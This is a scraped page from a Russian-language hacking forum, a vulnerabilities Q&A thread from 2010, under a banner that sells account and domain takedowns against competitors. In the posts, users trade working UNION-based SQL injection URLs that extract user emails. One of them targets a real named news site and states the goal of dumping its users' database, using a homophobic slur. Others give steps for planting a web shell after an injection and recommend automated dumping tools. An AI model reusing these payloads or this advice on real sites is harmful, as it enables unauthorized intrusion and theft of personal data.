УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1552 из 2438

1552

Опции темы

Поиск в этой теме

Опции просмотра

#15511

03.11.2010, 23:55

roddik

Познающий

Регистрация: 14.01.2009

Сообщений: 93

Провел на форуме:
244235

Репутация: 39

Привет, такая ситуация, есть инъекция в селекте, есть file_priv, кавычки не экранируются, есть фулл пасс к сайту. Но проблема в том, что, как я понял, прав на запись во что-то, видное из инета, не хватает - я могу записать в /tmp, но куда-то на сайт - нет. На сайте нету форм аплоада, в админке тоже нету, видимо картинки грузятся по фтп. Соседние сайты такие же ущербные, по крайней мере, на первый взгляд. Если я правильно понимаю, единственный вариант залить шелл в подобных условиях - найти писабельную папку? Ось freebsd, но при load_file папки я вижу несколько левых символов, но не вижу листинг файлов (почему такое может быть?). Какие есть тулзы для поиска форм аплоада? Спасибо

#15512

04.11.2010, 00:09

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

1. залей в /tmp

2. ищи инклуд

3. подцепи шеллик

#15513

04.11.2010, 23:01

ALIM

Новичок

Регистрация: 20.04.2010

Сообщений: 1

Провел на форуме:
4855

Репутация: 0

Цитата:

Сообщение от Gorev

Gorev said:
попробуй unhex(hex()) , aes_encrypt

http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--

Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?

#15514

04.11.2010, 23:06

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от ALIM

ALIM said:
http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(GROUP_CONCAT(e-mail),0x71),0x71),4%20from%20user%20--
Используя такую конструкцию выводится только 10 последних записей. Каким образом можно вывести все данные?

вручную через лимит по одной записи, все через утилиту...

#15515

04.11.2010, 23:07

pinch

Участник форума

Регистрация: 13.12.2009

Сообщений: 130

Провел на форуме:
540530

Репутация: 54

http://www.sssssssss.om/index.php?id=-24 union select 1,2,aes_decrypt(aes_encrypt(CONCAT(e-mail),0x71),0x71),4+from+user+limit+0,1--

лимитом перебирай

#15516

04.11.2010, 23:31

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от ALIM

ALIM said:
http://www.baywindows.com/index.php?ch=news&sc=glbt&sc3=&id=106949%20and%201 =2%20union%20select%20aes_decrypt(aes_encrypt(GROU P_CONCAT(email),0x71),0x71),2,3,4,5,6,7,8,9,10%20f rom%20users --
хотел слить базу гомиков, если кто-нибудь обьяснит в личку каким образом можно было слить всю базу, а не по одному скажу спасибо

что тут обьяснять? я же тебе выше написал, используй тулзу какую нибудь, например сипт или панголин...делов то...

#15517

04.11.2010, 23:36

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

Провел на форуме:
315861

Репутация: 5

Отправить сообщение для EoGeneo с помощью ICQ

Вопрос: Могу исполнять html, как залить шшел?

#15518

05.11.2010, 00:01

Kusto

Moderator - Level 7

Регистрация: 04.02.2007

Сообщений: 554

Провел на форуме:
7518056

Репутация: 1089

Отправить сообщение для Kusto с помощью ICQ

Цитата:

Сообщение от EoGeneo

EoGeneo said:
Вопрос: Могу исполнять html, как залить шшел?

мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно

#15519

05.11.2010, 00:05

EoGeneo

Познающий

Регистрация: 29.08.2009

Сообщений: 75

Провел на форуме:
315861

Репутация: 5

Цитата:

Сообщение от Kusto

Kusto said:
мы рады за Вас, одно фигово :то что ты написал- не взаимосвязанно

Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли

#15520

05.11.2010, 00:09

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от EoGeneo

EoGeneo said:
Я знаю, уже все что можно перепробовал, отчаялся и написал....мало ли

А то, что HTML - это язык гипертекстовой разметки, тебе не пришло в голову?

Страница 1552 из 2438

1552

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход